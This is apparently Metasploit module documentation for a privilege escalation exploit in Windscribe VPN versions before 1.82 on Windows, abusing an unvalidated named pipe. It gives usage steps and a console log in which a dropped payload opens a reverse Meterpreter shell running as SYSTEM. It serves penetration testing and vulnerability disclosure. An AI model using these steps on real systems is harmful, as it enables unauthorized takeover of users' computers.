## Description

  The Windscribe VPN client application for Windows makes use of a
  Windows service `WindscribeService.exe` which exposes a named pipe
  `\\.\pipe\WindscribeService` allowing execution of programs with
  elevated privileges.

  Windscribe versions prior to 1.82 do not validate user-supplied
  program names, allowing execution of arbitrary commands as SYSTEM.


## Vulnerable Application

  This module has been tested successfully on [Windscribe](https://windscribe.com/)
  version 1.80 and 1.81 on Windows 7 SP1 (x64).

  Download:

  * https://assets.windscribe.com/desktop/win/Windscribe_1.80.exe
  * https://assets.windscribe.com/desktop/win/Windscribe_1.81.exe


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/windows/local/windscribe_windscribeservice_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check`
  6. `run`
  7. You should get a new *SYSTEM* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `%TEMP%`)


## Scenarios

### Windows 7 SP1 (x64)

  ```
  msf5 > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
  session => 1
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > check
  [*] The service is running, but could not be validated.
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ...
  [*] Sending C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe to \\.\pipe\WindscribeService ...
  [+] Opened \\.\pipe\WindscribeService! Proceeding ...
  [*] Sending stage (180291 bytes) to 172.16.191.242
  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49365) at 2020-01-31 19:14:31 -0500
  [-] Failed to delete C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe: stdapi_fs_delete_file: Operation failed: Access is denied.

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer        : TEST
  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >
  ```

